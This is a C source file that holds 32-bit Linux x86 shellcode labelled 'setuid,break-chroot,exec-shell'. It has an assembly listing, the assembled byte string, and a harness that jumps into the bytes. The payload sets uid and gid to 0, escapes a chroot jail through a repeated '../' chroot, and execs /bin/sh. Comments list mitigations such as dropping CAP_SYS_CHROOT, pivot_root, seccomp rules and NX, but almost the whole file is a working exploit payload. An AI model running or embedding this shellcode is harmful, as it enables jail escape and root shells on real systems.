- /*
- .file "chroot"
- .version "01.01"
- .globl main
- .type main,@function
- main :
- pushl %ebp # shcode recognition
- #init
- movl %esp,%ebp # save stackpointer
- xorl %eax,%eax
- xorl %ebx,%ebx # reset the registers
- xorl %ecx,%ecx
-
- # setuid(0);
- movb $0x17,%al # 0x17 = SYS_setuid
- int $0x80
-
- # setgid(0);
- movb $0x2e,%al # 0x2e = SYS_setgid
- int $0x80
-
- # mkdir("sh");
- jmp 0x39
- popl %esi # get the address of our string
- movb $0x27,%al # 0x27 = SYS_mkdir
- leal 0x5(%esi),%ebx # string location
- movb $0xed,%cl # mode
- int $0x80
-
- # chroot("sh");
- # string addy is in %ebx
- movb $0x3d, %al # 0x3d = SYS_chroot
- int $0x80
-
- # construct string "../../../../../../../../../../"
- movl $0xff2f2e2e,%edx # "../"
- leal 0x4(%ebp),%ebx # save addy of the new string
- movb $0x10,%cl # set the counter
- movl %edx,0x4(%ebp) # construct the string
- addl $0x3,%ebp
- loopne -0x8
- movl %ecx,0x4(%ebp) # put in a NULL
-
- # chroot("../../../../../../../../../../");
- movb $0x3d,%al # 0x3d = SYS_chroot
- int $0x80
-
- # arg[0] = "/bin/sh";
- # arg[1] = 0x0
- # execve(arg[0],arg);
- movl %esi,%ebx
- movl %esi,0x8(%ebp)
- movl %ecx,0xc(%ebp)
- movb $0xb,%al
- leal 0x8(%ebp),%ecx
- leal 0xc(%ebp),%edx
- int $0x80
-
- call -0x3e
- .string "/bin/sh" # doesn't have to be in here
- */
-
- /* Byte count of code[] below: 81 opcode bytes + the 7-byte "/bin/sh".
-  * Reference only -- main() reports strlen(code) rather than this value. */
- #define CODESIZE 88
- /* Label printed by main() before the payload is run. */
- #define NAME "setuid,break-chroot,exec-shell"
- /*
-  * Assembled form of the AT&T listing in the comment above, for 32-bit
-  * Linux/x86 (int $0x80 syscall interface; not valid on x86-64).  Syscall
-  * order as the listing shows it: setuid(0), setgid(0), mkdir("sh"),
-  * chroot("sh"), chroot("../../..."), execve("/bin/sh", argv, envp).
-  * No byte before the "/bin/sh" terminator is 0x00, so strlen(code) == 88
-  * == CODESIZE.  No return value is checked after any int $0x80.
-  *
-  * Both chroot() calls require CAP_SYS_CHROOT, i.e. the leading setuid(0)
-  * must already have succeeded; dropping that capability, confining with
-  * mount namespaces/pivot_root instead of chroot(), or a seccomp/audit rule
-  * on chroot() followed by execve() are the corresponding mitigations.
-  */
- char code[]=
- "\x55\x89\xe5\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xb0\x2e\xcd\x80"
- "\xeb\x39\x5e\xb0\x27\x8d\x5e\x05\xb1\xed\xcd\x80\xb0\x3d\xcd\x80\xba"
- "\x2e\x2e\x2f\xff\x8d\x5d\x04\xb1\x10\x89\x55\x04\x83\xc5\x03\xe0\xf8"
- "\x89\x4d\x04\xb0\x3d\xcd\x80\x89\xf3\x89\x75\x08\x89\x4d\x0c\xb0\x0b"
- "\x8d\x4d\x08\x8d\x55\x0c\xcd\x80\xe8\xc2\xff\xff\xff/bin/sh";
- /*
-  * Test harness: print NAME and strlen(code), then transfer control into
-  * the code[] byte array as if it were a function.
-  *
-  * K&R-style definition: implicit int return, and printf()/strlen() are
-  * used without <stdio.h>/<string.h>, so they are implicitly declared.
-  * The indirect call only works where the data segment is executable;
-  * on a system enforcing NX/W^X the call faults instead -- that is the
-  * baseline mitigation for any data-as-code pattern like this one.
-  * On success the payload's execve() replaces the process, so control
-  * never returns here; the listing above builds its "../" string at
-  * 4(%ebp) and upward, i.e. over this frame's return address, so a
-  * return would not be survivable anyway.
-  */
- main()
- {
- int (*funct)();                      /* function-pointer view of code[] */
- funct = (int (*)()) code;
- printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code));
- (int)(*funct)();                     /* cast to int is a no-op; result is never used */
- }
-